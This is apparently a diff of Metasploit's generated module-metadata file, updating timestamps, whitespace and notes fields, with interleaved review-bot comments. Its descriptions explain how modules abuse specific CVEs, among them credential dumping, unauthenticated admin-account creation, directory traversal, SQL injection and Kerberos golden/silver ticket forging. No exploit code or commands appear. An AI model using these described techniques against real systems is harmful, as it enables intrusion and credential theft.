"path": "/modules/auxiliary/admin/http/openbravo_xxe.rb",
"is_install_path": true,
"ref_name": "admin/http/openbravo_xxe",
@@ -3474,7 +3551,7 @@
"author": [
"Jan-Frederik Rieckers"
],
"description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias",
"description": "Postfixadmin installations between 2.91 and 3.0.1 do not check if an\n admin is allowed to delete protected aliases. This vulnerability can be\n used to redirect protected aliases to an other mail address. Eg. rewrite\n the postmaster@domain alias",
"references": [
"CVE-2017-5930",
"URL-https://github.com/postfixadmin/postfixadmin/pull/23",
@@ -3499,7 +3576,7 @@
"https"
],
"targets": null,
"mod_time": "2021-02-17 12:33:59 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/pfadmin_set_protected_alias.rb",
"is_install_path": true,
"ref_name": "admin/http/pfadmin_set_protected_alias",
@@ -3613,7 +3690,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/rails_devise_pass_reset.rb",
"is_install_path": true,
"ref_name": "admin/http/rails_devise_pass_reset",
@@ -3687,7 +3764,7 @@
"Tanya Secker",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.",
"description": "This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer\n without any authentication. Versions such as 9.0.1 or older are affected.",
"references": [
"CVE-2012-2626",
"OSVDB-84318",
@@ -3712,7 +3789,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/scrutinizer_add_user.rb",
"is_install_path": true,
"ref_name": "admin/http/scrutinizer_add_user",
@@ -3737,7 +3814,7 @@
"Wolfgang Ettlingers",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.",
"description": "This module abuses a directory traversal in Sophos Web Protection Appliance, specifically\n on the /cgi-bin/patience.cgi component. This module has been tested successfully on the\n Sophos Web Virtual Appliance v3.7.0.",
"references": [
"CVE-2013-2641",
"OSVDB-91953",
@@ -3765,7 +3842,7 @@
"https"
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/sophos_wpa_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/sophos_wpa_traversal",
@@ -3790,7 +3867,7 @@
"Dhiraj Mishra",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an unauthenticated remote file inclusion which\n exists in Supra Smart Cloud TV. The media control for the device doesn't\n have any session management or authentication. Leveraging this, an\n attacker on the local network can send a crafted request to broadcast a\n fake video.",
"description": "This module exploits an unauthenticated remote file inclusion which\n exists in Supra Smart Cloud TV. The media control for the device doesn't\n have any session management or authentication. Leveraging this, an\n attacker on the local network can send a crafted request to broadcast a\n fake video.",
"references": [
"CVE-2019-12477",
"URL-https://www.inputzero.io/2019/06/hacking-smart-tv.html"
@@ -3814,7 +3891,7 @@
"https"
],
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.rb",
"is_install_path": true,
"ref_name": "admin/http/supra_smart_cloud_tv_rfi",
@@ -3838,7 +3915,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. This module has been tested on SysAid 14.4 in Windows and Linux.",
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to create an administrator account. Note that this exploit will only work once. Any\n subsequent attempts will fail. On the other hand, the credentials must be verified\n manually. This module has been tested on SysAid 14.4 in Windows and Linux.",
"references": [
"CVE-2015-2993",
"URL-https://seclists.org/fulldisclosure/2015/Jun/8",
@@ -3863,7 +3940,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_admin_acct.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_admin_acct",
@@ -3887,7 +3964,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.",
"description": "This module exploits two vulnerabilities in SysAid Help Desk that allows\n an unauthenticated user to download arbitrary files from the system. First, an\n information disclosure vulnerability (CVE-2015-2997) is used to obtain the file\n system path, and then we abuse a directory traversal (CVE-2015-2996) to download\n the file. Note that there are some limitations on Windows, in that the information\n disclosure vulnerability doesn't work on a Windows platform, and we can only\n traverse the current drive (if you enter C:\\afile.txt and the server is running\n on D:\\ the file will not be downloaded).\n\n This module has been tested with SysAid 14.4 on Windows and Linux.",
"references": [
"CVE-2015-2996",
"CVE-2015-2997",
@@ -3913,7 +3990,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_file_download",
@@ -3937,7 +4014,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.",
"description": "This module exploits a vulnerability in SysAid Help Desk that allows an unauthenticated\n user to download arbitrary files from the system. This is used to download the server\n configuration file that contains the database username and password, which is encrypted\n with a fixed, known key. This module has been tested with SysAid 14.4 on Windows and Linux.",
"references": [
"CVE-2015-2996",
"CVE-2015-2998",
@@ -3963,7 +4040,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/sysaid_sql_creds.rb",
"is_install_path": true,
"ref_name": "admin/http/sysaid_sql_creds",
@@ -3987,7 +4064,7 @@
"author": [
"Jan Rude"
],
"description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
"description": "This module exploits a vulnerability present in all versions of Telpho10 telephone system\n appliance. This module generates a configuration backup of Telpho10,\n downloads the file and dumps the credentials for admin login,\n phpmyadmin, phpldapadmin, etc.\n This module has been successfully tested on the appliance versions 2.6.31 and 2.6.39.",
"references": [
],
@@ -4010,7 +4087,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/telpho10_credential_dump.rb",
"is_install_path": true,
"ref_name": "admin/http/telpho10_credential_dump",
@@ -4057,7 +4134,7 @@
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_administration.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_administration",
@@ -4161,7 +4238,7 @@
"https"
],
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/tomcat_utf8_traversal",
@@ -4214,7 +4291,7 @@
"https"
],
"targets": null,
"mod_time": "2022-03-10 18:03:35 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/trendmicro_dlp_traversal",
@@ -4239,7 +4316,7 @@
"Marco Rivoli",
"Charles Fol"
],
"description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)",
"description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)",
"references": [
"CVE-2017-7581",
"URL-http://www.ambionics.io/blog/typo3-news-module-sqli"
@@ -4263,7 +4340,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_news_module_sqli",
@@ -4313,7 +4390,7 @@
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_001",
@@ -4337,7 +4414,7 @@
"author": [
"spinbad <spinbad.security@googlemail.com>"
],
"description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.",
"description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.",
"references": [
"OSVDB-52048",
"CVE-2009-0815",
@@ -4364,7 +4441,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_002",
@@ -4414,7 +4491,7 @@
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2010_020",
@@ -4461,7 +4538,7 @@
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_winstaller_default_enc_keys",
@@ -4486,7 +4563,7 @@
"Rick Osgood",
"Jacob Robles"
],
"description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.",
"description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.",
"references": [
"EDB-43141",
"CVE-2017-16806"
@@ -4510,7 +4587,7 @@
"https"
],
"targets": null,
"mod_time": "2021-01-29 17:59:14 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/ulterius_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/ulterius_file_download",
@@ -4561,7 +4638,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/vbulletin_upgrade_admin",
@@ -4585,7 +4662,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\nall user credentials. The first vulnerability is an unauthenticated file download\nin the FetchFile servlet, which is used to download the file containing the user\ncredentials. The second vulnerability is that the passwords in the file are\nobfuscated with a very weak algorithm which can be easily reversed.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\n all user credentials. The first vulnerability is an unauthenticated file download\n in the FetchFile servlet, which is used to download the file containing the user\n credentials. The second vulnerability is that the passwords in the file are\n obfuscated with a very weak algorithm which can be easily reversed.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.",
"references": [
"CVE-2016-6601",
"CVE-2016-6602",
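Review bot: the only difference between the removed and added webnms_cred_disclosure description is a leading space on each continuation line (`\nall user` becomes `\n all user`, `\nin the FetchFile` becomes `\n in the FetchFile`, and so on); the wording is unchanged. This brings the string in line with every other description in this file, all of which already carry that leading space after `\n`, so the change is correct, and the webnms_file_download hunk below shows the same normalisation. Since the indentation is now part of the stored description text, anything that prints the metadata string verbatim rather than through the framework's own formatting will show it, which is worth a mention in the commit message alongside the other whitespace-only description changes.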
@@ -4611,7 +4688,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_cred_disclosure",
@@ -4635,7 +4712,7 @@
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\nunauthenticated user to download files off the file system by using a directory\ntraversal attack on the FetchFile servlet.\nNote that only text files can be downloaded properly, as any binary file will get\nmangled by the servlet. Also note that for Windows targets you can only download\nfiles that are in the same drive as the WebNMS installation.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\n unauthenticated user to download files off the file system by using a directory\n traversal attack on the FetchFile servlet.\n Note that only text files can be downloaded properly, as any binary file will get\n mangled by the servlet. Also note that for Windows targets you can only download\n files that are in the same drive as the WebNMS installation.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.",
"references": [
"CVE-2016-6601",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
@@ -4660,7 +4737,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/webnms_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_file_download",
@@ -4771,7 +4848,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_custom_contact_forms",
@@ -4795,7 +4872,7 @@
"author": [
"rastating"
],
"description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.",
"description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.",
"references": [
"CVE-2015-2673",
"WPVDB-7808",
@@ -4820,7 +4897,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_easycart_privilege_escalation",
@@ -4845,7 +4922,7 @@
"Mikey Veenstra (WordFence)",
"Thomas Labadie"
],
"description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPresss admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.",
"description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPresss admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.",
"references": [
"URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/",
"CVE-2018-19207",
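Review bot: the regenerated description line in this hunk still carries the spelling errors "WordPresss" and lower-case "Wordpress" (twice); since this file is generated from module metadata, the fix belongs in the description string of /modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb rather than here, after which this entry will pick it up on the next automatic update. Note also that the removed and added description lines render identically, so this hunk is presumably a whitespace-only change inside the \n-separated string; worth confirming nothing else moved.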
@@ -4870,7 +4947,7 @@
"https"
],
"targets": null,
"mod_time": "2022-06-10 14:01:57 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_gdpr_compliance_privesc",
@@ -4927,7 +5004,7 @@
"https"
],
"targets": null,
"mod_time": "2019-04-15 07:06:27 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_google_maps_sqli",
@@ -5012,7 +5089,7 @@
"PizzaHatHacker",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.",
"description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.",
"references": [
"CVE-2015-6522",
"EDB-37824"
@@ -5036,7 +5113,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_symposium_sql_injection",
@@ -5084,7 +5161,7 @@
"https"
],
"targets": null,
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_wplms_privilege_escalation",
@@ -5132,7 +5209,7 @@
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"mod_time": "2023-02-08 14:30:08 +0000",
"path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/zyxel_admin_password_extractor",
@@ -5144,6 +5221,213 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/forge_ticket": {
"name": "Kerberos Silver/Golden Ticket Forging",
"fullname": "auxiliary/admin/kerberos/forge_ticket",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Benjamin Delpy",
"Dean Welch"
],
"description": "This module forges a Kerberos ticket",
"references": [
"URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-01-24 13:28:10 +0000",
"path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/forge_ticket",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
],
"AKA": [
"Silver Ticket",
"Golden Ticket",
"Ticketer",
"Klist"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/get_ticket": {
"name": "Kerberos TGT/TGS Ticket Requester",
"fullname": "auxiliary/admin/kerberos/get_ticket",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christophe De La Fuente",
"Spencer McIntyre",
"Will Schroeder",
"Lee Christensen",
"Oliver Lyak",
"smashery"
],
"description": "This module requests TGT/TGS Kerberos tickets from the KDC",
"references": [
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-01-24 15:12:00 +0000",
"path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/get_ticket",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"getTGT",
"getST"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/inspect_ticket": {
"name": "Kerberos Ticket Inspecting",
"fullname": "auxiliary/admin/kerberos/inspect_ticket",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dean Welch"
],
"description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-01-26 09:21:55 +0000",
"path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/inspect_ticket",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
],
"AKA": [
"klist"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/keytab": {
"name": "Kerberos keytab utilities",
"fullname": "auxiliary/admin/kerberos/keytab",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"alanfoster"
],
"description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2022-12-07 23:03:57 +0000",
"path": "/modules/auxiliary/admin/kerberos/keytab.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/keytab",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
"name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
"fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
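Review bot: the forge_ticket description ("This module forges a Kerberos ticket") is too terse for a module with this much surface; it should at least say that it produces silver (service) and golden (krbtgt) tickets and what key material it expects, in line with the more complete descriptions given for keytab and inspect_ticket in the same hunk. Two smaller points in the same block: the AKA entry "Klist" on forge_ticket is capitalised while inspect_ticket uses "klist", and klist is a ticket-listing alias that fits inspect_ticket, not a forging module, so consider dropping it from forge_ticket. Finally, forge_ticket, inspect_ticket and keytab all ship with empty Stability, SideEffects and Reliability arrays while get_ticket declares "crash-safe"; the forging and inspection modules are offline operations and could reasonably declare the same.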
@@ -5178,7 +5462,7 @@
],
"targets": null,
"mod_time": "2022-04-08 11:35:31 +0000",
"mod_time": "2023-01-27 09:11:43 +0000",
"path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
@@ -5190,6 +5474,58 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/kerberos/ticket_converter": {
"name": "Kerberos ticket converter",
"fullname": "auxiliary/admin/kerberos/ticket_converter",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Zer1t0",
"Dean Welch"
],
"description": "This module converts tickets to the ccache format from the kirbi format and vice versa.",
"references": [
"URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py",
"URL-https://tools.ietf.org/html/rfc4120",
"URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html",
"URL-https://github.com/gentilkiwi/kekeo",
"URL-https://github.com/rvazarkar/KrbCredExport"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2022-09-28 22:28:54 +0000",
"path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ticket_converter",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_admin/ldap/rbcd": {
"name": "Role Base Constrained Delegation",
"fullname": "auxiliary/admin/ldap/rbcd",
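Review bot: the ticket_converter entry added in this hunk leaves Stability, Reliability and SideEffects empty; an offline kirbi/ccache conversion is a clear "crash-safe" candidate, so suggest filling at least Stability so the module does not show up in note-coverage checks. Unrelated pre-existing nit visible in the trailing context: the rbcd module name reads "Role Base Constrained Delegation" where the Active Directory feature is "Resource-Based Constrained Delegation"; that is a module-source fix, not one for this generated file.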
@@ -6000,7 +6336,7 @@
"sybase"
],
"targets": null,
"mod_time": "2021-04-22 10:15:04 +0000",
"mod_time": "2022-06-29 12:20:37 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_idf.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_idf",
@@ -6379,7 +6715,7 @@
],
"targets": null,
"mod_time": "2021-02-16 13:56:50 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/networking/arista_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/arista_config",
@@ -6387,6 +6723,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": false
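Review bot: the notes block added for arista_config here is entirely empty (Stability, Reliability and SideEffects all []), and the same empty pattern is added for f5_config, juniper_config, mikrotik_config and shodan_host further down, while vyos_config in the same series gets "crash-safe" and "ioc-in-logs". If the intent is to satisfy a notes-presence lint, that is fine, but the config-download modules do the same kind of authenticated fetch as vyos_config and could carry the same two values rather than empty arrays.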
@@ -6706,7 +7051,7 @@
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb",
"is_install_path": true,
"ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass",
@@ -6714,6 +7059,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
